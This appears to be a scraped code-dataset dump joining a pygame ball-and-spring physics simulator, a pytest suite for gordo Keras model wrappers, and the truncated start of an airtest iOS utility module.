get_dis(x1, y1, x2, y2)\n if vec_len > EPS:\n vec_x /= vec_len\n vec_y /= vec_len\n return vec_x, vec_y\n\n\nclass MainGame:\n _display = pygame.display\n window = None\n ball_list = []\n elastic_list = []\n clock = pygame.time.Clock()\n collides = []\n hide_ball0 = False\n fps_pause = False\n\n def start_game(self):\n self._display.init()\n self.window = self._display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])\n self.create_my_ball()\n self.create_dead_ball()\n # self.elastic_list.append(Elastic(self.ball_list[0],\n # self.ball_list[1],\n # balance_len=1.))\n\n def legal(x, y):\n return 0 <= x < RIGID and 0 <= y < RIGID\n\n # 生成弹性链\n for i in range(RIGID * RIGID):\n x = i // RIGID\n y = i % RIGID\n for x1 in range(x - RIGID_ELASTIC_NUM, x + RIGID_ELASTIC_NUM + 1):\n for y1 in range(y - RIGID_ELASTIC_NUM, y + RIGID_ELASTIC_NUM + 1):\n if (not legal(x1, y1)) or (x1 == x and y1 == y):\n continue\n num = x1 * RIGID + y1\n if i < num:\n self.elastic_list.append(Elastic(self.ball_list[i],\n self.ball_list[num],\n get_dis(x, y, x1, y1) * RIGID_DIS))\n\n 
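        # (note: the loop above links every ball to each neighbour within
        #  RIGID_ELASTIC_NUM grid steps, with rest length = grid distance times
        #  RIGID_DIS; with RIGID_ELASTIC_NUM = 0 no springs are created at all)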
self._display.set_caption(\"Ball Simulator\")\n\n last_time = 0\n max_power = 0.\n while True:\n self.clock.tick(FPS)\n\n time_begin = time.time()\n\n self.window.fill(COLOR_BG)\n\n self.get_event()\n if not self.fps_pause:\n self.update_all_balls(FPS_TIME)\n\n for d in self.ball_list:\n d.display(self.window) # !!!\n for e in self.elastic_list:\n e.display(self.window)\n self._display.update()\n\n time_end = time.time()\n\n max_power = max(max_power, (time_end - time_begin) / FPS_TIME)\n\n timestamp = int(round(time.time() * 1000))\n if timestamp - last_time > 500:\n last_time = timestamp\n print('FPS:', self.clock.get_fps())\n print('Power used:', max_power * 100, '%')\n max_power = 0.\n\n def create_my_ball(self):\n # my = Ball(random.random() * (SCREEN_WIDTH / PIX_PER_METER),\n # random.random() * ((SCREEN_HEIGHT / 2 + 10) / PIX_PER_METER),\n # # 2,\n # img_src=IMG_SRC1, mass=WEIGHT1)\n\n my = Ball(RIGID_DIS, RIGID_DIS,\n img_src=IMG_SRC1, mass=WEIGHT1)\n self.ball_list.append(my) # the controllable ball is always at index 0\n\n def create_dead_ball(self):\n # for i in range(BALL_COUNT):\n # self.ball_list.append(Ball(random.random() * (SCREEN_WIDTH / PIX_PER_METER),\n # random.random() * ((SCREEN_HEIGHT / 2 + 10) / PIX_PER_METER),\n # # 2,\n # img_src=IMG_SRC2, mass=WEIGHT2))\n for i in range(BALL_COUNT):\n x = (i + 1) // RIGID\n y = (i + 1) % RIGID\n self.ball_list.append(Ball(RIGID_DIS + x * RIGID_DIS, RIGID_DIS + y * RIGID_DIS,\n img_src=IMG_SRC2, mass=WEIGHT2))\n\n def collide_split(self, node_list: list, x1, y1, x2, y2):\n if len(node_list) == 0:\n return\n\n points = [(x1, y1), (x1, y2), (x2, y2), (x2, y1)]\n pygame.draw.lines(self.window, (0, 127, 0), True, points, 1)\n pygame.draw.line(self.window, (255, 255, 255),\n (25, 50), (25 + PIX_PER_METER, 50), 1)\n\n if len(node_list) <= COLLIDE_TREE_MIN_SIZE:\n for d1 in node_list:\n for d2 in node_list:\n if (d1, d2) in self.collides or (d2, d1) in self.collides:\n continue\n if d1 != d2 and d1.hit_other(d2):\n self.collides.append((d1, d2))\n return\n father_list = []\n son_list = []\n x0 = (x1 + x2) / 2\n y0 = (y1 + y2) / 2\n for d in node_list:\n if d.rect.left <= x0 < d.rect.left + d.rect.width or d.rect.top <= y0 < d.rect.top + d.rect.height:\n father_list.append(d)\n else:\n son_list.append(d)\n for d1 in father_list:\n for d2 in node_list:\n if (d1, d2) in self.collides or (d2, d1) in self.collides:\n continue\n if d1 != d2 and d1.hit_other(d2):\n self.collides.append((d1, d2))\n son_list1 = []\n son_list2 = []\n son_list3 = []\n son_list4 = []\n for d in son_list:\n if d.rect.left + d.rect.width < 0. or d.rect.left > SCREEN_WIDTH or \\\n d.rect.top + d.rect.height < 0. 
or d.rect.top > SCREEN_HEIGHT:\n continue\n if d.rect.left > x0 and d.rect.top > y0:\n son_list1.append(d)\n elif d.rect.left + d.rect.width <= x0 and d.rect.top > y0:\n son_list2.append(d)\n elif d.rect.left + d.rect.width <= x0 and d.rect.top + d.rect.height <= y0:\n son_list3.append(d)\n elif d.rect.left > x0 and d.rect.top + d.rect.height <= y0:\n son_list4.append(d)\n self.collide_split(son_list1, x0, y0, x2, y2)\n self.collide_split(son_list2, x1, y0, x0, y2)\n self.collide_split(son_list3, x1, y1, x0, y0)\n self.collide_split(son_list4, x0, y1, x2, y0)\n\n def inter_gravity2(self):\n g_sum_x, g_sum_y = 0., 0.\n m_sum = 0.\n for d in self.ball_list:\n g_sum_x += d.x * d.mass\n g_sum_y += d.y * d.mass\n m_sum += d.mass\n for d in self.ball_list:\n g_sum_x_no_d = g_sum_x - d.x * d.mass\n g_sum_y_no_d = g_sum_y - d.y * d.mass\n m_sum_no_d = m_sum - d.mass\n center_x, center_y = g_sum_x_no_d / m_sum_no_d, g_sum_y_no_d / m_sum_no_d\n dis = ((center_x - d.x) ** 2 + (center_y - d.y) ** 2) ** 0.5\n vec_x, vec_y = center_x - d.x, center_y - d.y\n vec_len = (vec_x ** 2 + vec_y ** 2) ** 0.5\n vec_x /= vec_len\n vec_y /= vec_len\n f = INTER_G * d.mass * m_sum_no_d / dis ** 2\n d.speed_x += f * vec_x / d.mass * FPS_TIME\n d.speed_y += f * vec_y / d.mass * FPS_TIME\n\n def inter_gravity(self):\n inter = []\n for d1 in self.ball_list:\n for d2 in self.ball_list:\n if d1 != d2 and (d1, d2) not in inter and (d2, d1) not in inter:\n if self.hide_ball0 and (d1 == self.ball_list[0] or d2 == self.ball_list[0]):\n continue\n if CANCEL_INTER_GRAVITY_WHEN_COLLIDE and pygame.sprite.collide_mask(d1, d2):\n continue\n dis = ((d1.x - d2.x) ** 2 + (d1.y - d2.y) ** 2) ** 0.5\n vec_x, vec_y = d2.x - d1.x, d2.y - d1.y\n vec_len = (vec_x ** 2 + vec_y ** 2) ** 0.5\n vec_x /= vec_len\n vec_y /= vec_len\n f = INTER_G * d1.mass * d2.mass / dis ** 2\n d1.speed_x += f * vec_x / d1.mass * FPS_TIME\n d1.speed_y += f * vec_y / d1.mass * FPS_TIME\n d2.speed_x += -f * vec_x / d2.mass * FPS_TIME\n d2.speed_y += -f * vec_y / d2.mass * FPS_TIME\n inter.append((d1, d2))\n\n def update_all_balls(self, t):\n\n for d in self.ball_list:\n d.move()\n d.hit_edge()\n for e in self.elastic_list:\n e.affect(t)\n\n self.collides = []\n self.collide_split(self.ball_list, 0, 0, SCREEN_WIDTH, SCREEN_HEIGHT)\n\n # for d1 in self.ball_list:\n # for d2 in self.ball_list:\n # if (d1, d2) in self.collides or (d2, d1) in self.collides:\n # continue\n # if d1 != d2 and d1.hit_other(d2):\n # self.collides.append((d1, d2))\n\n if INTER_GRAVITY_ON:\n self.inter_gravity()\n\n def get_event(self):\n event_list = pygame.event.get()\n for event in event_list:\n if event.type == pygame.QUIT:\n self.end_game()\n di_di = {\n pygame.K_LEFT: 'L',\n pygame.K_RIGHT: 'R',\n pygame.K_UP: 'U',\n pygame.K_DOWN: 'D',\n }\n\n if event.type == pygame.KEYDOWN:\n if event.key in di_di:\n if KEY_ACC_FOR_ALL:\n for ball in self.ball_list:\n ball.power[di_di[event.key]] = True\n else:\n self.ball_list[0].power[di_di[event.key]] = True\n elif event.key == pygame.K_g:\n self.hide_ball0 = not self.hide_ball0\n if self.hide_ball0:\n self.ball_list[0].image.set_alpha(99)\n else:\n self.ball_list[0].image.set_alpha(255)\n elif event.key == pygame.K_SPACE:\n self.fps_pause = not self.fps_pause\n\n elif event.type == pygame.KEYUP:\n if event.key in di_di:\n if KEY_ACC_FOR_ALL:\n for ball in self.ball_list:\n ball.power[di_di[event.key]] = False\n else:\n self.ball_list[0].power[di_di[event.key]] = False\n\n @staticmethod\n def end_game():\n exit()\n\n\nclass 
BaseItem(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n\n\nclass Ball(BaseItem):\n def __init__(self, x, y, img_src='pic/circle.png', mass=1.0, elastic_list=None):\n super(Ball, self).__init__()\n self.mass = mass\n self.image = pygame.image.load(img_src)\n self.x = x\n self.y = y\n self.rect = self.image.get_rect()\n self.radius = self.rect.width / 2 / PIX_PER_METER\n self.x_last = x\n self.y_last = y\n self.speed_x = 0.\n self.speed_y = 0.\n self.speed_x_last = self.speed_x\n self.speed_y_last = self.speed_y\n self.mask = pygame.mask.from_surface(self.image)\n self.power = {\n 'U': False,\n 'L': False,\n 'D': False,\n 'R': False\n }\n\n def move(self):\n self.x_last = self.x\n self.y_last = self.y\n self.speed_x_last = self.speed_x\n self.speed_y_last = self.speed_y\n\n self.x += self.speed_x * FPS_TIME\n self.y += self.speed_y * FPS_TIME\n\n vec_speed_len = (self.speed_x ** 2 + self.speed_y ** 2) ** 0.5\n if abs(vec_speed_len) > EPS:\n norm_speed_x, norm_speed_y = self.speed_x / \\\n vec_speed_len, self.speed_y / vec_speed_len\n # friction\n self.speed_x += -MU * DOWNWARD_G * norm_speed_x * FPS_TIME\n self.speed_y += -MU * DOWNWARD_G * norm_speed_y * FPS_TIME\n # air drag\n self.speed_x += \\\n -K_AIR * vec_speed_len ** 2 * self.radius ** 2 * \\\n math.pi * norm_speed_x / self.mass * FPS_TIME\n self.speed_y += \\\n -K_AIR * vec_speed_len ** 2 * self.radius ** 2 * \\\n math.pi * norm_speed_y / self.mass * FPS_TIME\n\n # if drag overshot and flipped the velocity sign, clamp it to zero\n if (self.speed_x_last > EPS) != (self.speed_x > EPS):\n self.speed_x = 0.\n if (self.speed_y_last > EPS) != (self.speed_y > EPS):\n self.speed_y = 0.\n\n if self.power['L']:\n self.speed_x += -KEY_ACC * FPS_TIME\n if self.power['R']:\n self.speed_x += KEY_ACC * FPS_TIME\n if self.power['U']:\n self.speed_y += -KEY_ACC * FPS_TIME\n if self.power['D']:\n self.speed_y += KEY_ACC * FPS_TIME\n\n if DOWNWARD_GRAVITY_ON:\n self.speed_y += DOWNWARD_G * FPS_TIME\n\n self.rect.left = int(self.x * PIX_PER_METER - self.rect.width / 2)\n self.rect.top = int(self.y * PIX_PER_METER - self.rect.height / 2)\n\n def receive_f(self, f, vec_x, vec_y, t):\n a = f / self.mass\n self.speed_x += a * vec_x * t\n self.speed_y += a * vec_y * t\n\n def hit_other(self, other) -> bool:\n # elastic collision\n if pygame.sprite.collide_mask(self, other):\n vec_x, vec_y = other.x - self.x, other.y - self.y\n vec_speed_x, vec_speed_y = other.speed_x - \\\n self.speed_x, other.speed_y - self.speed_y\n if vec_x * vec_speed_x + vec_y * vec_speed_y > 0.:\n # skip the collision if the relative velocity is already separating\n return False\n vec_len = (vec_x ** 2 + vec_y ** 2) ** 0.5\n if abs(vec_len) > EPS:\n vec_x, vec_y = vec_x / vec_len, vec_y / vec_len\n\n v_cross1 = self.speed_x * vec_x + self.speed_y * vec_y\n vx1, vy1 = v_cross1 * vec_x, v_cross1 * vec_y\n v_ori_x1, v_ori_y1 = self.speed_x - vx1, self.speed_y - vy1\n # (vx1, vy1, v_ori_x1, v_ori_y1)\n\n v_cross2 = other.speed_x * vec_x + other.speed_y * vec_y\n vx2, vy2 = v_cross2 * vec_x, v_cross2 * vec_y\n v_ori_x2, v_ori_y2 = other.speed_x - vx2, other.speed_y - vy2\n # print(vx2, vy2, v_ori_x2, v_ori_y2)\n # print('----')\n\n # roll back to the previous position and update the collision position\n if AVOID_INTER_SUBMERGE:\n self.x, self.y = self.x_last, self.y_last\n other.x += other.speed_x * FPS_TIME\n other.y += other.speed_y * FPS_TIME\n\n self.rect.left = int(self.x * PIX_PER_METER - self.rect.width / 2)\n self.rect.top = int(self.y * PIX_PER_METER - self.rect.height / 2)\n other.rect.left = int(\n other.x * PIX_PER_METER - other.rect.width / 2)\n other.rect.top = int(\n other.y * PIX_PER_METER - other.rect.height / 2)\n\n 
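            # Note (added): the assignments below are the standard 1-D elastic
            # collision solution applied along the contact normal; the tangential
            # components (v_ori_*) pass through unchanged:
            #
            #   v1' = ((m1 - m2) * v1 + 2 * m2 * v2) / (m1 + m2)
            #   v2' = ((m2 - m1) * v2 + 2 * m1 * v1) / (m1 + m2)
            #
            # Quick sanity check: with m1 = m2 and v2 = 0 the formulas give
            # v1' = 0 and v2' = v1 (equal masses swap their normal velocities),
            # conserving both momentum and kinetic energy.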
self.speed_x = \\\n v_ori_x1 + ((self.mass - other.mass) * vx1 + 2 * other.mass * vx2) / \\\n (self.mass + other.mass)\n other.speed_x = \\\n v_ori_x2 + ((other.mass - self.mass) * vx2 + 2 * self.mass * vx1) / \\\n (self.mass + other.mass)\n self.speed_y = \\\n v_ori_y1 + ((self.mass - other.mass) * vy1 + 2 * other.mass * vy2) / \\\n (self.mass + other.mass)\n other.speed_y = \\\n v_ori_y2 + ((other.mass - self.mass) * vy2 + 2 * self.mass * vy1) / \\\n (self.mass + other.mass)\n return True\n return False\n\n def hit_edge(self):\n if self.x * PIX_PER_METER - self.rect.width / 2 < 0:\n if AVOID_EDGE_SUBMERGE:\n self.x = self.rect.width / 2 / PIX_PER_METER\n if self.speed_x < 0.:\n self.speed_x *= -1.\n\n if self.x * PIX_PER_METER + self.rect.width / 2 > SCREEN_WIDTH:\n if AVOID_EDGE_SUBMERGE:\n self.x = (SCREEN_WIDTH - self.rect.width / 2) / PIX_PER_METER\n if self.speed_x > 0.:\n self.speed_x *= -1.\n\n if self.y * PIX_PER_METER - self.rect.height / 2 < 0:\n if AVOID_EDGE_SUBMERGE:\n self.y = self.rect.height / 2 / PIX_PER_METER\n if self.speed_y < 0.:\n self.speed_y *= -1\n\n if self.y * PIX_PER_METER + self.rect.height / 2 > SCREEN_HEIGHT:\n if AVOID_EDGE_SUBMERGE:\n self.y = (SCREEN_HEIGHT - self.rect.height / 2) / PIX_PER_METER\n if self.speed_y > 0.:\n self.speed_y *= -1. # latex rule (bounce back like rubber)\n\n def display(self, window):\n window.blit(self.image, self.rect)\n\n\nclass Elastic:\n def __init__(self, d1: Ball, d2: Ball, balance_len):\n self.d1 = d1\n self.d2 = d2\n self.balance_len = balance_len\n\n def affect(self, t):\n # unit vector pointing from 1 to 2\n vec_x, vec_y = get_vec(self.d1.x, self.d1.y, self.d2.x, self.d2.y)\n dis = get_dis(self.d1.x, self.d1.y, self.d2.x, self.d2.y)\n f = K_ELASTIC * (dis - self.balance_len)\n self.d1.receive_f(f, vec_x, vec_y, t)\n self.d2.receive_f(f, -vec_x, -vec_y, t)\n\n def display(self, window: pygame.Surface):\n pygame.draw.line(window, (255, 255, 255),\n (self.d1.x * PIX_PER_METER, self.d1.y * PIX_PER_METER),\n (self.d2.x * PIX_PER_METER, self.d2.y * PIX_PER_METER),\n 2)\n\n\ndef collide(ball1: Ball, ball2: Ball):\n return ((ball1.x - ball2.x) ** 2 + (ball1.y - ball2.y) ** 2) ** 0.5 < ball1.radius + ball2.radius\n\n\ndef code(x, y):\n x = y ** 2\n\n\n# class MyBall(Ball):\n# def __init__(self, x, y):\n# super(MyBall, self).__init__(x, y)\n#\n#\n# class DeadBall(Ball):\n# def __init__(self, x, y):\n# super(DeadBall, self).__init__(x, y)\n\n\ndef main():\n game = MainGame()\n game.start_game()\n\n\nmain()\n","repo_name":"julyfun/ball_crash","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":18240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}{"seq_id":"6988451428","text":"# -*- coding: utf-8 -*-\n\nimport pickle\nimport logging\nimport pydoc\n\nimport pytest\nimport numpy as np\nimport xarray as xr\n\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import cross_val_score, TimeSeriesSplit\n\nfrom tensorflow.keras.wrappers.scikit_learn import KerasRegressor as BaseWrapper\nfrom tensorflow.keras.callbacks import EarlyStopping\n\nfrom tests.utils import get_model\nfrom gordo.machine.model.models import (\n KerasLSTMAutoEncoder,\n KerasLSTMForecast,\n KerasLSTMBaseEstimator,\n KerasBaseEstimator,\n KerasAutoEncoder,\n create_keras_timeseriesgenerator,\n)\nfrom gordo.machine.model.factories import lstm_autoencoder\nfrom gordo.machine.model.base import GordoBase\nfrom gordo.machine.model.register import 
register_model_builder\n\n\nlogger = logging.getLogger(__name__)\n\n\n# Generator of model types to each available model kind for that type\n# ie. (('KerasAutoEncoder', 'hourglass'), ('KerasAutoEncoder', 'symmetric'), ...)\nMODEL_COMBINATIONS = list(\n (model, kind)\n for model in register_model_builder.factories.keys()\n for kind in register_model_builder.factories[model].keys()\n)\n\n# Generator of model types to one kind, rather than all combinations of kinds per type\nMODEL_SINGLE_KIND = list(\n (model, sorted(register_model_builder.factories[model].keys())[0])\n for model in register_model_builder.factories.keys()\n)\n\n\n@pytest.mark.parametrize(\"BaseModel\", [KerasLSTMBaseEstimator, KerasBaseEstimator])\ndef test_base_class_models(BaseModel):\n \"\"\"\n Test that the ABC cannot be instantiated, in that they require some implementation\n \"\"\"\n with pytest.raises(TypeError):\n BaseModel()\n\n\n@pytest.mark.parametrize(\"n_features_out\", (2, 3))\n@pytest.mark.parametrize(\"model,kind\", MODEL_SINGLE_KIND)\ndef test_keras_autoencoder_scoring(model, kind, n_features_out):\n \"\"\"\n Test the KerasAutoEncoder and KerasLSTMAutoEncoder have a working scoring function\n \"\"\"\n Model = pydoc.locate(f\"gordo.machine.model.models.{model}\")\n model = Pipeline([(\"model\", Model(kind=kind))])\n X = np.random.random((8, 2))\n\n # Should be able to deal with y output different than X input features\n y = np.random.random((8, n_features_out))\n\n with pytest.raises(NotFittedError):\n model.score(X, y)\n\n model.fit(X, y)\n score = model.score(X, y)\n logger.info(f\"Score: {score:.4f}\")\n\n\n@pytest.mark.parametrize(\"model,kind\", MODEL_SINGLE_KIND)\ndef test_keras_autoencoder_crossval(model, kind):\n \"\"\"\n Test ability for cross validation\n \"\"\"\n Model = pydoc.locate(f\"gordo.machine.model.models.{model}\")\n model = Pipeline([(\"model\", Model(kind=kind))])\n\n X = np.random.random(size=(15, 2))\n y = X.copy()\n\n scores = cross_val_score(\n model, X, y, cv=TimeSeriesSplit(n_splits=2, max_train_size=2)\n )\n assert isinstance(scores, np.ndarray)\n logger.info(f\"Mean score: {scores.mean():.4f} - Std score: {scores.std():.4f}\")\n\n\n@pytest.mark.parametrize(\"model,kind\", MODEL_COMBINATIONS)\ndef test_keras_type_config(model, kind):\n \"\"\"\n Test creating a keras based model from config\n \"\"\"\n config = {\"type\": model, \"kind\": kind}\n\n # Ensure we can poke the model the same\n model_out = get_model(config)\n assert isinstance(model_out, GordoBase)\n assert isinstance(model_out, BaseWrapper)\n assert isinstance(model_out, pydoc.locate(f\"gordo.machine.model.models.{model}\"))\n\n\n@pytest.mark.parametrize(\"model,kind\", MODEL_SINGLE_KIND)\ndef test_save_load(model, kind):\n config = {\"type\": model, \"kind\": kind}\n\n # Have to call fit, since model production is lazy\n X = np.random.random(size=10).reshape(5, 2)\n y = X.copy()\n\n # AutoEncoder is fine without a y target\n config[\"type\"] = model\n model_out = get_model(config)\n if model == \"KerasLSTMForecast\":\n assert \"forecast_steps\" in model_out.get_metadata()\n\n assert \"history\" not in model_out.get_metadata()\n model_out.fit(X, y)\n assert \"history\" in model_out.get_metadata()\n\n xTest = np.random.random(size=6).reshape(3, 2)\n xHat = model_out.predict(xTest)\n\n model_out_clone = pickle.loads(pickle.dumps(model_out))\n\n # Assert parameters are the same.\n assert model_out.get_params() == model_out_clone.get_params()\n\n # Assert it maintained the state by ensuring predictions are the same\n 
assert np.allclose(xHat.flatten(), model_out_clone.predict(xTest).flatten())\n\n assert \"history\" in model_out.get_metadata()\n assert (\n model_out.get_metadata() == model_out_clone.get_metadata()\n ), \"Metadata from model is not same after saving and loading\"\n\n # Assert that epochs list, history dict and params dict in\n # the History object are the same\n assert (\n model_out.history.epoch == model_out_clone.history.epoch\n ), \"Epoch lists differ between original and loaded model history\"\n\n assert (\n model_out.history.history == model_out_clone.history.history\n ), \"History dictionary with losses and accuracies differ between original and loaded model history\"\n\n assert (\n model_out.history.params == model_out_clone.history.params\n ), \"Params dictionaries differ between original and loaded model history\"\n\n\ndef test_lookback_window_ae_valueerror_during_fit():\n \"\"\"\n Assert (for LSTMAutoEncoder) ValueError\n is raised in fit method if lookback_window > number of readings (rows of X)\n \"\"\"\n lookback_window = 11\n with pytest.raises(ValueError):\n model = KerasLSTMAutoEncoder(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n X, y = np.random.rand(10), np.random.rand(10)\n model.fit(X, y)\n\n\ndef test_keras_ae_reshapes_array():\n \"\"\"\n Asserts KerasLSTMAutoEncoder accepts an array of elements, which it will\n reshape into the matrix of single elements it needs\n \"\"\"\n model = KerasLSTMAutoEncoder(kind=lstm_autoencoder.lstm_model)\n X, y = np.random.rand(100), np.random.rand(100)\n model.fit(X, y)\n model.predict(X)\n\n\ndef test_keras_forecast_reshapes_array():\n \"\"\"\n Asserts KerasLSTMForecast accepts an array of elements, which it will\n reshape into the matrix of single elements it needs\n \"\"\"\n model = KerasLSTMForecast(kind=lstm_autoencoder.lstm_model)\n X, y = np.random.rand(100), np.random.rand(100)\n model.fit(X, y)\n model.predict(X)\n\n\ndef test_lookback_window_ae_valueerror_during_predict():\n \"\"\"\n Assert (for LSTMAutoEncoder) ValueError\n is raised in fit method if lookback_window > number of readings (rows of X)\n \"\"\"\n model = KerasLSTMAutoEncoder(kind=lstm_autoencoder.lstm_model, lookback_window=3)\n xTrain, yTrain = np.random.random(size=(4, 2)), np.random.random(size=(4, 2))\n model.fit(xTrain, yTrain)\n with pytest.raises(ValueError):\n model.predict(xTrain[-3:-1, :])\n\n\n@pytest.mark.parametrize(\"lookback_window\", (5, 6))\ndef test_lookback_window_forecast_valueerror_during_fit(lookback_window):\n \"\"\"\n Assert (for LSTMForecast) ValueError is raised\n in fit method if lookback_window >= number of readings (rows of X)\n \"\"\"\n model = KerasLSTMForecast(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n with pytest.raises(ValueError):\n X = np.random.random(size=(5, 2))\n y = X.copy()\n model.fit(X, y)\n\n\n@pytest.mark.parametrize(\"lookback_window\", (5, 6))\ndef test_lookback_window_forecast_valueerror_during_predict(lookback_window: int):\n \"\"\"\n Assert (for LSTMForecast) ValueError is raised\n in fit method if lookback_window >= number of readings (rows of X)\n \"\"\"\n X = np.random.random(size=(5, 2))\n y = X.copy()\n model = KerasLSTMForecast(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n with pytest.raises(ValueError):\n model.fit(X, y)\n\n\ndef test_create_keras_timeseriesgenerator_lb3_loah0_bs2():\n \"\"\"Check that right output is generated from create_keras_timeseriesgenerator\"\"\"\n X = np.array([[0, 1], [2, 3], [4, 5], [6, 
7], [8, 9]])\n y = X.copy()\n gen = create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=3, lookahead=0\n )\n batch_1 = gen[0]\n batch_2 = gen[1]\n\n batch_1_x = batch_1[0].tolist()\n batch_1_y = batch_1[1].tolist()\n\n batch_2_x = batch_2[0].tolist()\n batch_2_y = batch_2[1].tolist()\n\n assert [[[0, 1], [2, 3], [4, 5]], [[2, 3], [4, 5], [6, 7]]] == batch_1_x\n assert [[4, 5], [6, 7]] == batch_1_y\n\n assert [[[4, 5], [6, 7], [8, 9]]] == batch_2_x\n assert [[8, 9]] == batch_2_y\n\n\ndef test_create_keras_timeseriesgenerator_lb2_loah1_bs2():\n \"\"\"\n Check right output is generated from create_keras_timeseriesgenerator\n We use lookback_window 2 to get some more interesting batches with lookahead 1\n \"\"\"\n X = np.array([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]])\n y = X.copy()\n gen = create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=2, lookahead=1\n )\n batch_1 = gen[0]\n batch_2 = gen[1]\n\n batch_1_x = batch_1[0].tolist()\n batch_1_y = batch_1[1].tolist()\n\n batch_2_x = batch_2[0].tolist()\n batch_2_y = batch_2[1].tolist()\n\n assert [[[0, 1], [2, 3]], [[2, 3], [4, 5]]] == batch_1_x\n assert [[4, 5], [6, 7]] == batch_1_y\n\n assert [[[4, 5], [6, 7]]] == batch_2_x\n assert [[8, 9]] == batch_2_y\n\n\ndef test_create_keras_timeseriesgenerator_lb2_loah2_bs2():\n \"\"\"\n Check right output is generated from create_keras_timeseriesgenerator\n We use lookback_window 2 to get some more interesting batches with lookahead 2\n \"\"\"\n X = np.array([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9]])\n y = X.copy()\n gen = create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=2, lookahead=2\n )\n batch_1 = gen[0]\n batch_2 = gen[1]\n\n batch_1_x = batch_1[0].tolist()\n batch_1_y = batch_1[1].tolist()\n\n batch_2_x = batch_2[0].tolist()\n batch_2_y = batch_2[1].tolist()\n\n assert [[[0, 1], [2, 3]], [[2, 3], [4, 5]]] == batch_1_x\n assert [[6, 7], [8, 9]] == batch_1_y\n\n assert [] == batch_2_x # No more elements left\n assert [] == batch_2_y\n\n\ndef test_create_keras_timeseriesgenerator_raise_error_on_neg_lookahead():\n \"\"\"Check create_keras_timeseriesgenerator raises an error on negative lookahead\"\"\"\n X = np.array([[0, 1]])\n y = X.copy()\n with pytest.raises(ValueError):\n create_keras_timeseriesgenerator(\n X, y, batch_size=2, lookback_window=2, lookahead=-1\n )\n\n\ndef test_lstmae_predict_output():\n \"\"\"\n test for KerasLSTMAutoEncoder\n - test dimension of output\n - test that first half of output is testing data\n \"\"\"\n xTrain, yTrain = np.random.random(size=(5, 3)), np.random.random((5, 3))\n lookback_window = 3\n model = KerasLSTMAutoEncoder(\n kind=lstm_autoencoder.lstm_model, lookback_window=lookback_window\n )\n model = model.fit(xTrain, yTrain)\n xTest = np.random.random(size=(4, 3))\n out = model.predict(xTest)\n assert out.shape == (2, 3)\n\n\ndef test_keras_autoencoder_fits_callbacks():\n model = KerasAutoEncoder(\n kind=\"feedforward_hourglass\",\n batch_size=128,\n callbacks=[\n {\n \"tensorflow.keras.callbacks.EarlyStopping\": {\n \"monitor\": \"val_loss\",\n \"patience\": 10,\n }\n }\n ],\n )\n sk_params = model.sk_params\n assert len(sk_params[\"callbacks\"]) == 1\n first_callback = sk_params[\"callbacks\"][0]\n assert isinstance(first_callback, EarlyStopping)\n assert first_callback.monitor == \"val_loss\"\n assert first_callback.patience == 10\n\n\ndef test_parse_module_path():\n assert KerasBaseEstimator.parse_module_path(\"gordo_client.Client\") == (\n \"gordo_client\",\n \"Client\",\n )\n assert 
KerasBaseEstimator.parse_module_path(\"gordo.Client\") == (\"gordo\", \"Client\")\n assert KerasBaseEstimator.parse_module_path(\"Client\") == (None, \"Client\")\n\n\ndef test_wrong_kind():\n with pytest.raises(ValueError):\n KerasAutoEncoder(kind=\"my_feedforward_hourglass\")\n with pytest.raises(ValueError):\n KerasAutoEncoder(kind=\"not.existing.module.encoder\")\n\n\ndef test_get_n_features_out():\n a = np.array([[1], [2]])\n assert KerasAutoEncoder.get_n_features_out(a) == 1\n a = np.array([[[2, 3]], [[3, 4]]])\n assert KerasAutoEncoder.get_n_features_out(a) == (1, 2)\n a = np.array([1, 2, 3])\n with pytest.raises(ValueError):\n KerasAutoEncoder.get_n_features_out(a)\n\n\ndef test_get_n_features():\n a = np.array([[1], [2]])\n assert KerasAutoEncoder.get_n_features(a) == 1\n a = xr.DataArray(np.array([[[2, 3]], [[3, 4]]]))\n assert KerasAutoEncoder.get_n_features(a) == (1, 2)\n a = np.array([[[2, 3]], [[3, 4]]])\n assert KerasAutoEncoder.get_n_features(a) == 2\n a = np.array([1, 2, 3])\n with pytest.raises(ValueError):\n KerasAutoEncoder.get_n_features(a)\n\n\ndef test_import_kind():\n model = KerasBaseEstimator(\n kind=\"gordo.machine.model.factories.feedforward_autoencoder.feedforward_hourglass\"\n )\n X, y = np.random.rand(10, 10), np.random.rand(10, 10)\n model.fit(X, y)\n\n\ndef test_for_wrong_kind_import():\n model = KerasBaseEstimator(kind=\"gordo.machine.model.factories.wrong_autoencoder\")\n X, y = np.random.rand(10, 10), np.random.rand(10, 10)\n with pytest.raises(ValueError):\n model.fit(X, y)\n","repo_name":"equinor/gordo","sub_path":"tests/gordo/machine/model/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":13442,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"38"}{"seq_id":"2936402288","text":"# -*- coding: utf-8 -*-\nimport os\nimport re\nimport wda\nfrom airtest.utils.compat import decode_path\n\n\nTHISPATH = decode_path(os.path.dirname(os.path.realpath(__file__)))\nDEFAULT_IPROXY_PATH = {\n \"Windows\": os.path.join(THISPATH, \"iproxy\", \"windows\", \"iproxy.exe\"),\n \"Darwin\": os.path.join(THISPATH, \"iproxy\", \"mac\", \"iproxy\"),\n}\nDEBUG = True\nIP_PATTERN = re.compile(r'(\\d+\\.){3}\\d+')\n\n# When some devices (6P/7P/8P) are in landscape mode, the desktop will also change to landscape mode,\n# but the click coordinates are vertical screen coordinates and require special processing\n# Since wda cannot report the phone model, screen size is used for now to identify Plus phones\n# https://developer.apple.com/design/human-interface-guidelines/ios/visual-design/adaptivity-and-layout/\nLANDSCAPE_PAD_RESOLUTION = [(1242, 